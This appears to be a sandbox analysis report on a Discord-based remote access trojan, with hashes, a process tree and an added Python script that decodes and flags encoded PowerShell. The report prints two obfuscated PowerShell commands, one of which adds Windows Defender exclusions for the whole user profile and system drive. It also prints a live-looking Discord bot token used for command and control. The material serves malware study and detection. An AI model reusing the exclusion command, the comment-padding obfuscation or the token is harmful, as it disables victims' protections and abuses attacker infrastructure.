Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64
    arch:x86
    image:win7-20241023-en
    locale:en-us
    os:windows7-x64
    system
  • submitted
    11-12-2024 14:17

General

  • Target

    CODEX17.exe

  • Size

    307KB

  • MD5

    53cc7337eed07bbbe0172f0b64bc6245

  • SHA1

    9b0ac7e0eaffdb6ed8af1501939f40bd798f6be0

  • SHA256

    1e5a4524dab6f1e4125043a7cdcfb6874c32a0514941ec4a90211f53efeef058

  • SHA512

    ff2ec069d7877fdc646dfaaba4d9525ef71c04c93936accdd1bc1bfe9ab873ab27cceb9c2d34d25f3b3e6d4e6bb4ece707b797d2f5672d73583e21a361fb333d

  • SSDEEP

    6144:m2EUicOFEG3AFDmDbpM6/XETGNNjyhRJNJC32XENQ8NvN:m2rOXTfpNg+

Malware Config

Extracted

Family

discordrat

Attributes
  • discord_token

    MTMwODQxMjQ0MjIyODk1MzIwMA.GV9W16.iYVXo71VO-dFm-6aOmZjrpuYUGqFHWVGtkvM5Q

  • server_id

    1316071968298111026

Signatures

  • Discord RAT

    A RAT written in C# using Discord as a C2.

  • Discordrat family
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 6 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection. Here both powershell.exe invocations pass the script via -EncodedCommand (Base64 over UTF-16LE) and pad it with inline block comments of the form <#xxx#> between tokens, so the command line never shows Add-MpPreference or MessageBox in clear text.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\CODEX17.exe
    "C:\Users\Admin\AppData\Local\Temp\CODEX17.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2592
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAaABrACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGQAaABiACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARQByAHIAbwByACcALAAnACcALAAnAE8ASwAnACwAJwBXAGEAcgBuAGkAbgBnACcAKQA8ACMAaABoAG4AIwA+AA=="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2108
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAdABiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAdQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHQAaAB5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGUAZQB0ACMAPgA="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2284
    • C:\Users\Admin\AppData\Local\Temp\Client-built.exe
      "C:\Users\Admin\AppData\Local\Temp\Client-built.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2820
      • C:\Windows\system32\WerFault.exe
        C:\Windows\system32\WerFault.exe -u -p 2820 -s 596
        3⤵
        • Loads dropped DLL
        PID:2292
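
The two powershell.exe entries above carry their script in -EncodedCommand form, which is Base64 over UTF-16LE rather than UTF-8. The following Python is an added example, not part of this report and not the sample's own code: it pulls the encoded argument out of a command line (PowerShell accepts any unambiguous prefix of -EncodedCommand, so -e, -ec and -enc are handled), decodes it, strips the <#xxx#> filler comments and runs a few triage rules over the cleaned script. The sample inputs are the two command lines recorded for PIDs 2108 and 2284, copied verbatim; the rule names and the Set-MpPreference rule are illustrative assumptions, not something the report itself flags.

```python
"""Decode and triage PowerShell -EncodedCommand invocations.

Added example; not part of the sandbox report and not the malware's own code.
"""
import base64
import re
from typing import Optional

# Sample inputs: the two command lines from the Processes tree (PIDs 2108 and
# 2284), copied verbatim from the report.
ENC_2108 = (
    "PAAjAHoAaABrACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwA"
    "eQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIA"
    "bQBzADsAPAAjAGQAaABiACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcA"
    "cwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8A"
    "dwAoACcARQByAHIAbwByACcALAAnACcALAAnAE8ASwAnACwAJwBXAGEAcgBuAGkA"
    "bgBnACcAKQA8ACMAaABoAG4AIwA+AA=="
)
ENC_2284 = (
    "PAAjAGUAdABiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA"
    "PAAjAHgAdQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAA"
    "KAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMA"
    "eQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHQAaAB5ACMAPgAgAC0ARgBvAHIA"
    "YwBlACAAPAAjAGUAZQB0ACMAPgA="
)
PS_EXE = '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"'
CMDLINE_2108 = f'{PS_EXE} -EncodedCommand "{ENC_2108}"'
CMDLINE_2284 = f'{PS_EXE} -EncodedCommand "{ENC_2284}"'

# "-flag value" pairs; the value class is Base64 plus padding, so other switches
# such as -NoProfile (followed by another "-") are skipped.
_ARG_RE = re.compile(r'-([A-Za-z]+)\s+"?([A-Za-z0-9+/=]+)"?')
# PowerShell block comment, possibly spanning lines.
_BLOCK_COMMENT_RE = re.compile(r"<#.*?#>", re.S)

# Illustrative triage rules (assumed names, not taken from the report).
RULES = {
    "defender-exclusion": re.compile(
        r"\bAdd-MpPreference\b.*-Exclusion(?:Path|Process|Extension)", re.I),
    "defender-disable": re.compile(r"\bSet-MpPreference\b.*-Disable\w+", re.I),
    "decoy-dialog": re.compile(r"MessageBox\]::Show\(", re.I),
}


def extract_encoded_command(cmdline: str) -> Optional[str]:
    """Return the Base64 payload of an -EncodedCommand style argument, if any.

    PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -en,
    -enc, ...) and the explicit short form -ec, so match by prefix.
    """
    for flag, value in _ARG_RE.findall(cmdline):
        f = flag.lower()
        if f == "ec" or (f.startswith("e") and "encodedcommand".startswith(f)):
            return value
    return None


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand payloads are Base64 over UTF-16LE text."""
    return base64.b64decode(b64).decode("utf-16-le")


def strip_block_comments(script: str) -> str:
    """Drop <# ... #> filler comments and collapse the leftover whitespace."""
    return re.sub(r"\s+", " ", _BLOCK_COMMENT_RE.sub("", script)).strip()


def triage(cmdline: str) -> dict:
    """Decode, clean and classify one PowerShell command line."""
    b64 = extract_encoded_command(cmdline)
    if b64 is None:
        return {"encoded": False, "decoded": None, "cleaned": None, "flags": []}
    decoded = decode_encoded_command(b64)
    cleaned = strip_block_comments(decoded)
    flags = [name for name, rx in RULES.items() if rx.search(cleaned)]
    if _BLOCK_COMMENT_RE.search(decoded):
        flags.append("comment-obfuscation")
    return {"encoded": True, "decoded": decoded, "cleaned": cleaned, "flags": flags}


if __name__ == "__main__":
    for pid, cmd in (("2108", CMDLINE_2108), ("2284", CMDLINE_2284)):
        result = triage(cmd)
        print(f"PID {pid}: {result['cleaned']}")
        print(f"  flags: {result['flags']}")
```

Run as a script it prints the cleaned command for each PID: PID 2108 resolves to an Add-Type plus a MessageBox.Show('Error','','OK','Warning') decoy, and PID 2284 to Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force, which excludes the whole user profile and system drive from Defender scanning before Client-built.exe is dropped. The cleaned form is what to feed into detection logic; matching on the raw command line would miss it because the cmdlet names only exist inside the Base64.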

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Client-built.exe

    Filesize

    78KB

    MD5

    eef37e61081aca867be51dab8d02c732

    SHA1

    b58736f3eb07dedd144e61a8e38802de1c15b947

    SHA256

    d74aed2a699c0ad2be01c761918ddcd5486bcf331a0a54a02bed4e073bdb39a8

    SHA512

    08555aeb12b54264370e1e4154a7509efe21b84fbe5aa1fd4c322b22886a149adeaa3ff7e9b1b54f9c1ccd1dcc9ae32e5702c876b9ed1b58f63a9a1c61425078

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    33be2dcdbaf814b56fcf254b98ccd4b9

    SHA1

    40553bd037a0afb4f247759a83424f9bf3570e39

    SHA256

    28f11dd0b5b11213fa68754a0f026ba6f372d9a6020d233681f993834df98aa5

    SHA512

    d904c4aa36423d21833e1aa9c7f8f4f3df61c4d00b611445bd219488608750c8db2b4806a6a9eb715a94d9ab5b6c33e710c3250c69e1db9d24876a275fc52718

  • memory/2108-2-0x0000000073B61000-0x0000000073B62000-memory.dmp

    Filesize

    4KB

  • memory/2108-3-0x0000000073B60000-0x000000007410B000-memory.dmp

    Filesize

    5.7MB

  • memory/2108-5-0x0000000073B60000-0x000000007410B000-memory.dmp

    Filesize

    5.7MB

  • memory/2108-4-0x0000000073B60000-0x000000007410B000-memory.dmp

    Filesize

    5.7MB

  • memory/2108-6-0x0000000073B60000-0x000000007410B000-memory.dmp

    Filesize

    5.7MB

  • memory/2108-24-0x0000000073B60000-0x000000007410B000-memory.dmp

    Filesize

    5.7MB

  • memory/2108-25-0x0000000073B60000-0x000000007410B000-memory.dmp

    Filesize

    5.7MB

  • memory/2820-13-0x000000013FA20000-0x000000013FA38000-memory.dmp

    Filesize

    96KB
